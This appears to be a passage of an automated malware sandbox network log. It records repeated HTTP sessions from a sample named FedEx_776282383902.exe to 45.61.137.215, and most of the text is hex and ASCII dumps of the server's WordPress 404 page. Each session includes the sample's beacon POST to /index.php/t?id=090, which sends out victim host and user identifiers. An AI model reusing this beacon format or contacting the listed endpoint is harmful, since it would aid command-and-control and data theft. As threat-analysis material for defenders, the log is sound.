May 22, 2024 22:03:15.112165928 CEST	672	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 22, 2024 22:03:15.115322113 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:03:15.115338087 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 22, 2024 22:03:15.116930962 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 22, 2024 22:03:15.116945982 CEST	224	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49740	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:03:15.260798931 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:03:15.313049078 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:03:18.733680010 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:03:15 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:03:18.734201908 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:03:18.735496998 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:03:18.735511065 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:03:18.738084078 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:03:18.738096952 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:03:18.740662098 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 22, 2024 22:03:18.740674973 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 22, 2024 22:03:18.740684032 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 22, 2024 22:03:18.743223906 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49741	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:03:18.886668921 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:03:18.936917067 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:03:22.165946007 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:03:19 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:03:22.166960955 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:03:22.167726040 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:03:22.167738914 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:03:22.169919014 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:03:22.169934988 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 22, 2024 22:03:22.172151089 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 22, 2024 22:03:22.172164917 CEST	1236	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
May 22, 2024 22:03:22.175484896 CEST	1236	IN	Data Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
May 22, 2024 22:03:22.175529003 CEST	1236	IN	Data Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49742	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:03:22.325206041 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:03:22.381710052 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:03:25.641832113 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:03:22 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:03:25.642281055 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:03:25.643412113 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:03:25.644623995 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
